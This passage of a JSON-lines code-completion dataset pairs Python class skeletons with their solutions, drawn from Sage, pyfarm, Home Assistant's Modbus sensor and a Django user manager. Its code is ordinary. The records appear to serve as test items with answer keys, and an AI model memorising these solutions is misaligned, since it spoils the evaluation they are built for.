sage: f(alpha=1) () {'alpha': 1} sage: f(rgbcolor=1) () {'rgbcolor': 1} sage: f(color=1) () {'rgbcolor': 1} We can also deprecate the renamed keyword:: sage: r = rename_keyword(deprecation=13109, deprecated_option='new_option') sage: def f(*args, **kwds): ....: print(\"{} {}\".format(args, kwds)) sage: f = r(f) sage: f() () {} sage: f(alpha=1) () {'alpha': 1} sage: f(new_option=1) () {'new_option': 1} sage: f(deprecated_option=1) doctest:...: DeprecationWarning: use the opt", "name": "__call__", "signature": "def __call__(self, func)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_000641", "prompt": "Implement the Python class `rename_keyword` described below.\n\nClass description:\nImplement the rename_keyword class.\n\nMethod signatures and docstrings:\n- def __init__(self, deprecated=None, deprecation=None, **renames): A decorator which renames keyword arguments and optionally deprecates the new keyword. INPUT: - ``deprecation`` -- integer. The trac ticket number where the deprecation was introduced. - the rest of the arguments is a list of keyword arguments in the form ``renamed_option='existing_option'``. This will have the effect of renaming ``renamed_option`` so that the function only sees ``existing_option``. If both ``renamed_option`` and ``existing_option`` are passed to the function, ``existing_option`` will override the ``renamed_option`` value. EXAMPLES:: sage: from sage.misc.decorators import rename_keyword sage: r = rename_keyword(color='rgbcolor') sage: r.renames {'color': 'rgbcolor'} sage: lo\n- def __call__(self, func): Rename keywords. EXAMPLES:: sage: from sage.misc.decorators import rename_keyword sage: r = rename_keyword(color='rgbcolor') sage: def f(*args, **kwds): ....: print(\"{} {}\".format(args, kwds)) sage: f = r(f) sage: f() () {} sage: f(alpha=1) () {'alpha': 1} sage: f(rgbcolor=1) () {'rgbcolor': 1} sage: f(color=1) () {'rgbcolor': 1} We can also deprecate the renamed keyword:: sage: r = rename_keyword(deprecation=13109, deprecated_option='new_option') sage: def f(*args, **kwds): ....: print(\"{} {}\".format(args, kwds)) sage: f = r(f) sage: f() () {} sage: f(alpha=1) () {'alpha': 1} sage: f(new_option=1) () {'new_option': 1} sage: f(deprecated_option=1) doctest:...: DeprecationWarning: use the opt", "prompted_full_text": "Implement the Python class `rename_keyword` described below.\n\nClass description:\nImplement the rename_keyword class.\n\nMethod signatures and docstrings:\n- def __init__(self, deprecated=None, deprecation=None, **renames): A decorator which renames keyword arguments and optionally deprecates the new keyword. INPUT: - ``deprecation`` -- integer. The trac ticket number where the deprecation was introduced. - the rest of the arguments is a list of keyword arguments in the form ``renamed_option='existing_option'``. This will have the effect of renaming ``renamed_option`` so that the function only sees ``existing_option``. If both ``renamed_option`` and ``existing_option`` are passed to the function, ``existing_option`` will override the ``renamed_option`` value. EXAMPLES:: sage: from sage.misc.decorators import rename_keyword sage: r = rename_keyword(color='rgbcolor') sage: r.renames {'color': 'rgbcolor'} sage: lo\n- def __call__(self, func): Rename keywords. EXAMPLES:: sage: from sage.misc.decorators import rename_keyword sage: r = rename_keyword(color='rgbcolor') sage: def f(*args, **kwds): ....: print(\"{} {}\".format(args, kwds)) sage: f = r(f) sage: f() () {} sage: f(alpha=1) () {'alpha': 1} sage: f(rgbcolor=1) () {'rgbcolor': 1} sage: f(color=1) () {'rgbcolor': 1} We can also deprecate the renamed keyword:: sage: r = rename_keyword(deprecation=13109, deprecated_option='new_option') sage: def f(*args, **kwds): ....: print(\"{} {}\".format(args, kwds)) sage: f = r(f) sage: f() () {} sage: f(alpha=1) () {'alpha': 1} sage: f(new_option=1) () {'new_option': 1} sage: f(deprecated_option=1) doctest:...: DeprecationWarning: use the opt\n\n<|skeleton|>\nclass rename_keyword:\n\n def __init__(self, deprecated=None, deprecation=None, **renames):\n \"\"\"A decorator which renames keyword arguments and optionally deprecates the new keyword. INPUT: - ``deprecation`` -- integer. The trac ticket number where the deprecation was introduced. - the rest of the arguments is a list of keyword arguments in the form ``renamed_option='existing_option'``. This will have the effect of renaming ``renamed_option`` so that the function only sees ``existing_option``. If both ``renamed_option`` and ``existing_option`` are passed to the function, ``existing_option`` will override the ``renamed_option`` value. EXAMPLES:: sage: from sage.misc.decorators import rename_keyword sage: r = rename_keyword(color='rgbcolor') sage: r.renames {'color': 'rgbcolor'} sage: lo\"\"\"\n <|body_0|>\n\n def __call__(self, func):\n \"\"\"Rename keywords. EXAMPLES:: sage: from sage.misc.decorators import rename_keyword sage: r = rename_keyword(color='rgbcolor') sage: def f(*args, **kwds): ....: print(\"{} {}\".format(args, kwds)) sage: f = r(f) sage: f() () {} sage: f(alpha=1) () {'alpha': 1} sage: f(rgbcolor=1) () {'rgbcolor': 1} sage: f(color=1) () {'rgbcolor': 1} We can also deprecate the renamed keyword:: sage: r = rename_keyword(deprecation=13109, deprecated_option='new_option') sage: def f(*args, **kwds): ....: print(\"{} {}\".format(args, kwds)) sage: f = r(f) sage: f() () {} sage: f(alpha=1) () {'alpha': 1} sage: f(new_option=1) () {'new_option': 1} sage: f(deprecated_option=1) doctest:...: DeprecationWarning: use the opt\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n assert deprecated is None, 'Use @rename_keyword(deprecation=, ...)'\n self.renames = renames\n self.deprecation = deprecation\n<|end_body_0|>\n\n<|body_start_1|>\n @sage_wraps(func)\n def wrapper(*args, **kwds):\n for old_name, new_name in self.renames.items():\n if old_name in kwds and new_name not in kwds:\n if self.deprecation is not None:\n from sage.misc.superseded import deprecation\n deprecation(self.deprecation, 'use the option %r instead of %r' % (new_name, old_name))\n kwds[new_name] = kwds[old_name]\n del kwds[old_name]\n return func(*args, **kwds)\n return wrapper\n<|end_body_1|>\n", "revision_id": "0d9eacbf74e2acffefde93e39f8bcbec745cdaba", "skeleton": "<|skeleton|>\nclass rename_keyword:\n\n def __init__(self, deprecated=None, deprecation=None, **renames):\n \"\"\"A decorator which renames keyword arguments and optionally deprecates the new keyword. INPUT: - ``deprecation`` -- integer. The trac ticket number where the deprecation was introduced. - the rest of the arguments is a list of keyword arguments in the form ``renamed_option='existing_option'``. This will have the effect of renaming ``renamed_option`` so that the function only sees ``existing_option``. If both ``renamed_option`` and ``existing_option`` are passed to the function, ``existing_option`` will override the ``renamed_option`` value. EXAMPLES:: sage: from sage.misc.decorators import rename_keyword sage: r = rename_keyword(color='rgbcolor') sage: r.renames {'color': 'rgbcolor'} sage: lo\"\"\"\n <|body_0|>\n\n def __call__(self, func):\n \"\"\"Rename keywords. EXAMPLES:: sage: from sage.misc.decorators import rename_keyword sage: r = rename_keyword(color='rgbcolor') sage: def f(*args, **kwds): ....: print(\"{} {}\".format(args, kwds)) sage: f = r(f) sage: f() () {} sage: f(alpha=1) () {'alpha': 1} sage: f(rgbcolor=1) () {'rgbcolor': 1} sage: f(color=1) () {'rgbcolor': 1} We can also deprecate the renamed keyword:: sage: r = rename_keyword(deprecation=13109, deprecated_option='new_option') sage: def f(*args, **kwds): ....: print(\"{} {}\".format(args, kwds)) sage: f = r(f) sage: f() () {} sage: f(alpha=1) () {'alpha': 1} sage: f(new_option=1) () {'new_option': 1} sage: f(deprecated_option=1) doctest:...: DeprecationWarning: use the opt\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class rename_keyword:\n def __init__(self, deprecated=None, deprecation=None, **renames):\n \"\"\"A decorator which renames keyword arguments and optionally deprecates the new keyword. INPUT: - ``deprecation`` -- integer. The trac ticket number where the deprecation was introduced. - the rest of the arguments is a list of keyword arguments in the form ``renamed_option='existing_option'``. This will have the effect of renaming ``renamed_option`` so that the function only sees ``existing_option``. If both ``renamed_option`` and ``existing_option`` are passed to the function, ``existing_option`` will override the ``renamed_option`` value. EXAMPLES:: sage: from sage.misc.decorators import rename_keyword sage: r = rename_keyword(color='rgbcolor') sage: r.renames {'color': 'rgbcolor'} sage: lo\"\"\"\n assert deprecated is None, 'Use @rename_keyword(deprecation=, ...)'\n self.renames = renames\n self.deprecation = deprecation\n\n def __call__(self, func):\n \"\"\"Rename keywords. EXAMPLES:: sage: from sage.misc.decorators import rename_keyword sage: r = rename_keyword(color='rgbcolor') sage: def f(*args, **kwds): ....: print(\"{} {}\".format(args, kwds)) sage: f = r(f) sage: f() () {} sage: f(alpha=1) () {'alpha': 1} sage: f(rgbcolor=1) () {'rgbcolor': 1} sage: f(color=1) () {'rgbcolor': 1} We can also deprecate the renamed keyword:: sage: r = rename_keyword(deprecation=13109, deprecated_option='new_option') sage: def f(*args, **kwds): ....: print(\"{} {}\".format(args, kwds)) sage: f = r(f) sage: f() () {} sage: f(alpha=1) () {'alpha': 1} sage: f(new_option=1) () {'new_option': 1} sage: f(deprecated_option=1) doctest:...: DeprecationWarning: use the opt\"\"\"\n @sage_wraps(func)\n def wrapper(*args, **kwds):\n for old_name, new_name in self.renames.items():\n if old_name in kwds and new_name not in kwds:\n if self.deprecation is not None:\n from sage.misc.superseded import deprecation\n deprecation(self.deprecation, 'use the option %r instead of %r' % (new_name, old_name))\n kwds[new_name] = kwds[old_name]\n del kwds[old_name]\n return func(*args, **kwds)\n return wrapper\n", "source": "the_stack_v2_python_sparse", "source_path": "sage/src/sage/misc/decorators.py", "source_repo": "bopopescu/geosci", "split": "test", "star_events_count": 0} {"blob_id": "59f807542b550a07d64ae0ac56cfc8b5e9582621", "bodies": ["if value is None or self.MIN_PRIORITY <= value <= self.MAX_PRIORITY:\n return value\nerr_args = (key, self.MIN_PRIORITY, self.MAX_PRIORITY, value)\nraise ValueError('%s must be between %s and %s, got %s instead' % err_args)", "if value is None or value >= 0:\n return value\nraise ValueError('%s cannot be less than zero' % key)"], "bodies_text": "<|body_start_0|>\n if value is None or self.MIN_PRIORITY <= value <= self.MAX_PRIORITY:\n return value\n err_args = (key, self.MIN_PRIORITY, self.MAX_PRIORITY, value)\n raise ValueError('%s must be between %s and %s, got %s instead' % err_args)\n<|end_body_0|>\n\n<|body_start_1|>\n if value is None or value >= 0:\n return value\n raise ValueError('%s cannot be less than zero' % key)\n<|end_body_1|>\n", "class_docstring": "Mixin that adds a `state` column and uses a class level `STATE_ENUM` attribute to assist in validation.", "class_name": "ValidatePriorityMixin", "detected_licenses": ["BSD-3-Clause", "Apache-2.0", "MIT", "LicenseRef-scancode-unknown-license-reference"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ValidatePriorityMixin:\n \"\"\"Mixin that adds a `state` column and uses a class level `STATE_ENUM` attribute to assist in validation.\"\"\"\n\n def validate_priority(self, key, value):\n \"\"\"ensures the value provided to priority is valid\"\"\"\n <|body_0|>\n\n def validate_attempts(self, key, value):\n \"\"\"ensures the number of attempts provided is valid\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if value is None or self.MIN_PRIORITY <= value <= self.MAX_PRIORITY:\n return value\n err_args = (key, self.MIN_PRIORITY, self.MAX_PRIORITY, value)\n raise ValueError('%s must be between %s and %s, got %s instead' % err_args)\n<|end_body_0|>\n\n<|body_start_1|>\n if value is None or value >= 0:\n return value\n raise ValueError('%s cannot be less than zero' % key)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000418", "length_bytes": 16227, "license_type": "permissive", "methods": [{"docstring": "ensures the value provided to priority is valid", "name": "validate_priority", "signature": "def validate_priority(self, key, value)"}, {"docstring": "ensures the number of attempts provided is valid", "name": "validate_attempts", "signature": "def validate_attempts(self, key, value)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002827", "prompt": "Implement the Python class `ValidatePriorityMixin` described below.\n\nClass description:\nMixin that adds a `state` column and uses a class level `STATE_ENUM` attribute to assist in validation.\n\nMethod signatures and docstrings:\n- def validate_priority(self, key, value): ensures the value provided to priority is valid\n- def validate_attempts(self, key, value): ensures the number of attempts provided is valid", "prompted_full_text": "Implement the Python class `ValidatePriorityMixin` described below.\n\nClass description:\nMixin that adds a `state` column and uses a class level `STATE_ENUM` attribute to assist in validation.\n\nMethod signatures and docstrings:\n- def validate_priority(self, key, value): ensures the value provided to priority is valid\n- def validate_attempts(self, key, value): ensures the number of attempts provided is valid\n\n<|skeleton|>\nclass ValidatePriorityMixin:\n \"\"\"Mixin that adds a `state` column and uses a class level `STATE_ENUM` attribute to assist in validation.\"\"\"\n\n def validate_priority(self, key, value):\n \"\"\"ensures the value provided to priority is valid\"\"\"\n <|body_0|>\n\n def validate_attempts(self, key, value):\n \"\"\"ensures the number of attempts provided is valid\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if value is None or self.MIN_PRIORITY <= value <= self.MAX_PRIORITY:\n return value\n err_args = (key, self.MIN_PRIORITY, self.MAX_PRIORITY, value)\n raise ValueError('%s must be between %s and %s, got %s instead' % err_args)\n<|end_body_0|>\n\n<|body_start_1|>\n if value is None or value >= 0:\n return value\n raise ValueError('%s cannot be less than zero' % key)\n<|end_body_1|>\n", "revision_id": "ea04bbcb807eb669415c569417b4b1b68e75d29d", "skeleton": "<|skeleton|>\nclass ValidatePriorityMixin:\n \"\"\"Mixin that adds a `state` column and uses a class level `STATE_ENUM` attribute to assist in validation.\"\"\"\n\n def validate_priority(self, key, value):\n \"\"\"ensures the value provided to priority is valid\"\"\"\n <|body_0|>\n\n def validate_attempts(self, key, value):\n \"\"\"ensures the number of attempts provided is valid\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ValidatePriorityMixin:\n \"\"\"Mixin that adds a `state` column and uses a class level `STATE_ENUM` attribute to assist in validation.\"\"\"\n\n def validate_priority(self, key, value):\n \"\"\"ensures the value provided to priority is valid\"\"\"\n if value is None or self.MIN_PRIORITY <= value <= self.MAX_PRIORITY:\n return value\n err_args = (key, self.MIN_PRIORITY, self.MAX_PRIORITY, value)\n raise ValueError('%s must be between %s and %s, got %s instead' % err_args)\n\n def validate_attempts(self, key, value):\n \"\"\"ensures the number of attempts provided is valid\"\"\"\n if value is None or value >= 0:\n return value\n raise ValueError('%s cannot be less than zero' % key)\n", "source": "the_stack_v2_python_sparse", "source_path": "pyfarm/models/core/mixins.py", "source_repo": "pyfarm/pyfarm-master", "split": "test", "star_events_count": 2} {"blob_id": "4408d3351401dc52435f2ab39e1f26ace725432a", "bodies": ["super().__init__(hub, entry)\nif slave_count:\n self._count = self._count * (slave_count + 1)\nself._coordinator: DataUpdateCoordinator[list[int] | None] | None = None\nself._attr_native_unit_of_measurement = entry.get(CONF_UNIT_OF_MEASUREMENT)\nself._attr_state_class = entry.get(CONF_STATE_CLASS)\nself._attr_device_class = entry.get(CONF_DEVICE_CLASS)", "name = self._attr_name if self._attr_name else 'modbus_sensor'\nself._coordinator = DataUpdateCoordinator(hass, _LOGGER, name=name)\nslaves: list[SlaveSensor] = []\nfor idx in range(0, slave_count):\n slaves.append(SlaveSensor(self._coordinator, idx, entry))\nreturn slaves", "await self.async_base_added_to_hass()\nstate = await self.async_get_last_sensor_data()\nif state:\n self._attr_native_value = state.native_value", "raw_result = await self._hub.async_pb_call(self._slave, self._address, self._count, self._input_type)\nif raw_result is None:\n if self._lazy_errors:\n self._lazy_errors -= 1\n return\n self._lazy_errors = self._lazy_error_count\n self._attr_available = False\n self._attr_native_value = None\n if self._coordinator:\n self._coordinator.async_set_updated_data(None)\n self.async_write_ha_state()\n return\nresult = self.unpack_structure_result(raw_result.registers)\nif self._coordinator:\n if result:\n result_array = list(map(float if self._precision else int, result.split(',')))\n self._attr_native_value = result_array[0]\n self._coordinator.async_set_updated_data(result_array)\n else:\n self._attr_native_value = None\n self._coordinator.async_set_updated_data(None)\nelse:\n self._attr_native_value = result\nself._attr_available = self._attr_native_value is not None\nself._lazy_errors = self._lazy_error_count\nself.async_write_ha_state()"], "bodies_text": "<|body_start_0|>\n super().__init__(hub, entry)\n if slave_count:\n self._count = self._count * (slave_count + 1)\n self._coordinator: DataUpdateCoordinator[list[int] | None] | None = None\n self._attr_native_unit_of_measurement = entry.get(CONF_UNIT_OF_MEASUREMENT)\n self._attr_state_class = entry.get(CONF_STATE_CLASS)\n self._attr_device_class = entry.get(CONF_DEVICE_CLASS)\n<|end_body_0|>\n\n<|body_start_1|>\n name = self._attr_name if self._attr_name else 'modbus_sensor'\n self._coordinator = DataUpdateCoordinator(hass, _LOGGER, name=name)\n slaves: list[SlaveSensor] = []\n for idx in range(0, slave_count):\n slaves.append(SlaveSensor(self._coordinator, idx, entry))\n return slaves\n<|end_body_1|>\n\n<|body_start_2|>\n await self.async_base_added_to_hass()\n state = await self.async_get_last_sensor_data()\n if state:\n self._attr_native_value = state.native_value\n<|end_body_2|>\n\n<|body_start_3|>\n raw_result = await self._hub.async_pb_call(self._slave, self._address, self._count, self._input_type)\n if raw_result is None:\n if self._lazy_errors:\n self._lazy_errors -= 1\n return\n self._lazy_errors = self._lazy_error_count\n self._attr_available = False\n self._attr_native_value = None\n if self._coordinator:\n self._coordinator.async_set_updated_data(None)\n self.async_write_ha_state()\n return\n result = self.unpack_structure_result(raw_result.registers)\n if self._coordinator:\n if result:\n result_array = list(map(float if self._precision else int, result.split(',')))\n self._attr_native_value = result_array[0]\n self._coordinator.async_set_updated_data(result_array)\n else:\n self._attr_native_value = None\n self._coordinator.async_set_updated_data(None)\n else:\n self._attr_native_value = result\n self._attr_available = self._attr_native_value is not None\n self._lazy_errors = self._lazy_error_count\n self.async_write_ha_state()\n<|end_body_3|>\n", "class_docstring": "Modbus register sensor.", "class_name": "ModbusRegisterSensor", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ModbusRegisterSensor:\n \"\"\"Modbus register sensor.\"\"\"\n\n def __init__(self, hub: ModbusHub, entry: dict[str, Any], slave_count: int) -> None:\n \"\"\"Initialize the modbus register sensor.\"\"\"\n <|body_0|>\n\n async def async_setup_slaves(self, hass: HomeAssistant, slave_count: int, entry: dict[str, Any]) -> list[SlaveSensor]:\n \"\"\"Add slaves as needed (1 read for multiple sensors).\"\"\"\n <|body_1|>\n\n async def async_added_to_hass(self) -> None:\n \"\"\"Handle entity which will be added.\"\"\"\n <|body_2|>\n\n async def async_update(self, now: datetime | None=None) -> None:\n \"\"\"Update the state of the sensor.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(hub, entry)\n if slave_count:\n self._count = self._count * (slave_count + 1)\n self._coordinator: DataUpdateCoordinator[list[int] | None] | None = None\n self._attr_native_unit_of_measurement = entry.get(CONF_UNIT_OF_MEASUREMENT)\n self._attr_state_class = entry.get(CONF_STATE_CLASS)\n self._attr_device_class = entry.get(CONF_DEVICE_CLASS)\n<|end_body_0|>\n\n<|body_start_1|>\n name = self._attr_name if self._attr_name else 'modbus_sensor'\n self._coordinator = DataUpdateCoordinator(hass, _LOGGER, name=name)\n slaves: list[SlaveSensor] = []\n for idx in range(0, slave_count):\n slaves.append(SlaveSensor(self._coordinator, idx, entry))\n return slaves\n<|end_body_1|>\n\n<|body_start_2|>\n await self.async_base_added_to_hass()\n state = await self.async_get_last_sensor_data()\n if state:\n self._attr_native_value = state.native_value\n<|end_body_2|>\n\n<|body_start_3|>\n raw_result = await self._hub.async_pb_call(self._slave, self._address, self._count, self._input_type)\n if raw_result is None:\n if self._lazy_errors:\n self._lazy_errors -= 1\n return\n self._lazy_errors = self._lazy_error_count\n self._attr_available = False\n self._attr_native_value = None\n if self._coordinator:\n self._coordinator.async_set_updated_data(None)\n self.async_write_ha_state()\n return\n result = self.unpack_structure_result(raw_result.registers)\n if self._coordinator:\n if result:\n result_array = list(map(float if self._precision else int, result.split(',')))\n self._attr_native_value = result_array[0]\n self._coordinator.async_set_updated_data(result_array)\n else:\n self._attr_native_value = None\n self._coordinator.async_set_updated_data(None)\n else:\n self._attr_native_value = result\n self._attr_available = self._attr_native_value is not None\n self._lazy_errors = self._lazy_error_count\n self.async_write_ha_state()\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000419", "length_bytes": 6226, "license_type": "permissive", "methods": [{"docstring": "Initialize the modbus register sensor.", "name": "__init__", "signature": "def __init__(self, hub: ModbusHub, entry: dict[str, Any], slave_count: int) -> None"}, {"docstring": "Add slaves as needed (1 read for multiple sensors).", "name": "async_setup_slaves", "signature": "async def async_setup_slaves(self, hass: HomeAssistant, slave_count: int, entry: dict[str, Any]) -> list[SlaveSensor]"}, {"docstring": "Handle entity which will be added.", "name": "async_added_to_hass", "signature": "async def async_added_to_hass(self) -> None"}, {"docstring": "Update the state of the sensor.", "name": "async_update", "signature": "async def async_update(self, now: datetime | None=None) -> None"}], "n_methods": 4, "prompt": "Implement the Python class `ModbusRegisterSensor` described below.\n\nClass description:\nModbus register sensor.\n\nMethod signatures and docstrings:\n- def __init__(self, hub: ModbusHub, entry: dict[str, Any], slave_count: int) -> None: Initialize the modbus register sensor.\n- async def async_setup_slaves(self, hass: HomeAssistant, slave_count: int, entry: dict[str, Any]) -> list[SlaveSensor]: Add slaves as needed (1 read for multiple sensors).\n- async def async_added_to_hass(self) -> None: Handle entity which will be added.\n- async def async_update(self, now: datetime | None=None) -> None: Update the state of the sensor.", "prompted_full_text": "Implement the Python class `ModbusRegisterSensor` described below.\n\nClass description:\nModbus register sensor.\n\nMethod signatures and docstrings:\n- def __init__(self, hub: ModbusHub, entry: dict[str, Any], slave_count: int) -> None: Initialize the modbus register sensor.\n- async def async_setup_slaves(self, hass: HomeAssistant, slave_count: int, entry: dict[str, Any]) -> list[SlaveSensor]: Add slaves as needed (1 read for multiple sensors).\n- async def async_added_to_hass(self) -> None: Handle entity which will be added.\n- async def async_update(self, now: datetime | None=None) -> None: Update the state of the sensor.\n\n<|skeleton|>\nclass ModbusRegisterSensor:\n \"\"\"Modbus register sensor.\"\"\"\n\n def __init__(self, hub: ModbusHub, entry: dict[str, Any], slave_count: int) -> None:\n \"\"\"Initialize the modbus register sensor.\"\"\"\n <|body_0|>\n\n async def async_setup_slaves(self, hass: HomeAssistant, slave_count: int, entry: dict[str, Any]) -> list[SlaveSensor]:\n \"\"\"Add slaves as needed (1 read for multiple sensors).\"\"\"\n <|body_1|>\n\n async def async_added_to_hass(self) -> None:\n \"\"\"Handle entity which will be added.\"\"\"\n <|body_2|>\n\n async def async_update(self, now: datetime | None=None) -> None:\n \"\"\"Update the state of the sensor.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(hub, entry)\n if slave_count:\n self._count = self._count * (slave_count + 1)\n self._coordinator: DataUpdateCoordinator[list[int] | None] | None = None\n self._attr_native_unit_of_measurement = entry.get(CONF_UNIT_OF_MEASUREMENT)\n self._attr_state_class = entry.get(CONF_STATE_CLASS)\n self._attr_device_class = entry.get(CONF_DEVICE_CLASS)\n<|end_body_0|>\n\n<|body_start_1|>\n name = self._attr_name if self._attr_name else 'modbus_sensor'\n self._coordinator = DataUpdateCoordinator(hass, _LOGGER, name=name)\n slaves: list[SlaveSensor] = []\n for idx in range(0, slave_count):\n slaves.append(SlaveSensor(self._coordinator, idx, entry))\n return slaves\n<|end_body_1|>\n\n<|body_start_2|>\n await self.async_base_added_to_hass()\n state = await self.async_get_last_sensor_data()\n if state:\n self._attr_native_value = state.native_value\n<|end_body_2|>\n\n<|body_start_3|>\n raw_result = await self._hub.async_pb_call(self._slave, self._address, self._count, self._input_type)\n if raw_result is None:\n if self._lazy_errors:\n self._lazy_errors -= 1\n return\n self._lazy_errors = self._lazy_error_count\n self._attr_available = False\n self._attr_native_value = None\n if self._coordinator:\n self._coordinator.async_set_updated_data(None)\n self.async_write_ha_state()\n return\n result = self.unpack_structure_result(raw_result.registers)\n if self._coordinator:\n if result:\n result_array = list(map(float if self._precision else int, result.split(',')))\n self._attr_native_value = result_array[0]\n self._coordinator.async_set_updated_data(result_array)\n else:\n self._attr_native_value = None\n self._coordinator.async_set_updated_data(None)\n else:\n self._attr_native_value = result\n self._attr_available = self._attr_native_value is not None\n self._lazy_errors = self._lazy_error_count\n self.async_write_ha_state()\n<|end_body_3|>\n", "revision_id": "80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743", "skeleton": "<|skeleton|>\nclass ModbusRegisterSensor:\n \"\"\"Modbus register sensor.\"\"\"\n\n def __init__(self, hub: ModbusHub, entry: dict[str, Any], slave_count: int) -> None:\n \"\"\"Initialize the modbus register sensor.\"\"\"\n <|body_0|>\n\n async def async_setup_slaves(self, hass: HomeAssistant, slave_count: int, entry: dict[str, Any]) -> list[SlaveSensor]:\n \"\"\"Add slaves as needed (1 read for multiple sensors).\"\"\"\n <|body_1|>\n\n async def async_added_to_hass(self) -> None:\n \"\"\"Handle entity which will be added.\"\"\"\n <|body_2|>\n\n async def async_update(self, now: datetime | None=None) -> None:\n \"\"\"Update the state of the sensor.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ModbusRegisterSensor:\n \"\"\"Modbus register sensor.\"\"\"\n\n def __init__(self, hub: ModbusHub, entry: dict[str, Any], slave_count: int) -> None:\n \"\"\"Initialize the modbus register sensor.\"\"\"\n super().__init__(hub, entry)\n if slave_count:\n self._count = self._count * (slave_count + 1)\n self._coordinator: DataUpdateCoordinator[list[int] | None] | None = None\n self._attr_native_unit_of_measurement = entry.get(CONF_UNIT_OF_MEASUREMENT)\n self._attr_state_class = entry.get(CONF_STATE_CLASS)\n self._attr_device_class = entry.get(CONF_DEVICE_CLASS)\n\n async def async_setup_slaves(self, hass: HomeAssistant, slave_count: int, entry: dict[str, Any]) -> list[SlaveSensor]:\n \"\"\"Add slaves as needed (1 read for multiple sensors).\"\"\"\n name = self._attr_name if self._attr_name else 'modbus_sensor'\n self._coordinator = DataUpdateCoordinator(hass, _LOGGER, name=name)\n slaves: list[SlaveSensor] = []\n for idx in range(0, slave_count):\n slaves.append(SlaveSensor(self._coordinator, idx, entry))\n return slaves\n\n async def async_added_to_hass(self) -> None:\n \"\"\"Handle entity which will be added.\"\"\"\n await self.async_base_added_to_hass()\n state = await self.async_get_last_sensor_data()\n if state:\n self._attr_native_value = state.native_value\n\n async def async_update(self, now: datetime | None=None) -> None:\n \"\"\"Update the state of the sensor.\"\"\"\n raw_result = await self._hub.async_pb_call(self._slave, self._address, self._count, self._input_type)\n if raw_result is None:\n if self._lazy_errors:\n self._lazy_errors -= 1\n return\n self._lazy_errors = self._lazy_error_count\n self._attr_available = False\n self._attr_native_value = None\n if self._coordinator:\n self._coordinator.async_set_updated_data(None)\n self.async_write_ha_state()\n return\n result = self.unpack_structure_result(raw_result.registers)\n if self._coordinator:\n if result:\n result_array = list(map(float if self._precision else int, result.split(',')))\n self._attr_native_value = result_array[0]\n self._coordinator.async_set_updated_data(result_array)\n else:\n self._attr_native_value = None\n self._coordinator.async_set_updated_data(None)\n else:\n self._attr_native_value = result\n self._attr_available = self._attr_native_value is not None\n self._lazy_errors = self._lazy_error_count\n self.async_write_ha_state()\n", "source": "the_stack_v2_python_sparse", "source_path": "homeassistant/components/modbus/sensor.py", "source_repo": "home-assistant/core", "split": "test", "star_events_count": 35501} {"blob_id": "c8b1c1b2d2ab18f52a9460373d356f84e597c542", "bodies": ["if not email:\n raise ValueError('Users must have an email address')\nuser = self.model(username=username, email=self.normalize_email(email))\nuser.set_password(password)\nuser.save(using=self._db)\nreturn user", "user = self.create_user(username, email, password=password)\nuser.is_admin = True\nuser.is_staff = True\nuser.save(using=self._db)\nreturn user"], "bodies_text": "<|body_start_0|>\n if not email:\n raise ValueError('Users must have an email address')\n user = self.model(username=username, email=self.normalize_email(email))\n user.set_password(password)\n user.save(using=self._db)\n return user\n<|end_body_0|>\n\n<|body_start_1|>\n user = self.create_user(username, email, password=password)\n user.is_admin = True\n user.is_staff = True\n user.save(using=self._db)\n return user\n<|end_body_1|>\n", "class_docstring": "", "class_name": "MyUserManager", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MyUserManager:\n\n def create_user(self, username, email, password=None):\n \"\"\"Creates and saves a User with the given email, date of birth and password.\"\"\"\n <|body_0|>\n\n def create_superuser(self, username, email, password):\n \"\"\"Creates and saves a superuser with the given email, date of birth and password.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not email:\n raise ValueError('Users must have an email address')\n user = self.model(username=username, email=self.normalize_email(email))\n user.set_password(password)\n user.save(using=self._db)\n return user\n<|end_body_0|>\n\n<|body_start_1|>\n user = self.create_user(username, email, password=password)\n user.is_admin = True\n user.is_staff = True\n user.save(using=self._db)\n return user\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000420", "length_bytes": 3320, "license_type": "no_license", "methods": [{"docstring": "Creates and saves a User with the given email, date of birth and password.", "name": "create_user", "signature": "def create_user(self, username, email, password=None)"}, {"docstring": "Creates and saves a superuser with the given email, date of birth and password.", "name": "create_superuser", "signature": "def create_superuser(self, username, email, password)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001381", "prompt": "Implement the Python class `MyUserManager` described below.\n\nClass description:\nImplement the MyUserManager class.\n\nMethod signatures and docstrings:\n- def create_user(self, username, email, password=None): Creates and saves a User with the given email, date of birth and password.\n- def create_superuser(self, username, email, password): Creates and saves a superuser with the given email, date of birth and password.", "prompted_full_text": "Implement the Python class `MyUserManager` described below.\n\nClass description:\nImplement the MyUserManager class.\n\nMethod signatures and docstrings:\n- def create_user(self, username, email, password=None): Creates and saves a User with the given email, date of birth and password.\n- def create_superuser(self, username, email, password): Creates and saves a superuser with the given email, date of birth and password.\n\n<|skeleton|>\nclass MyUserManager:\n\n def create_user(self, username, email, 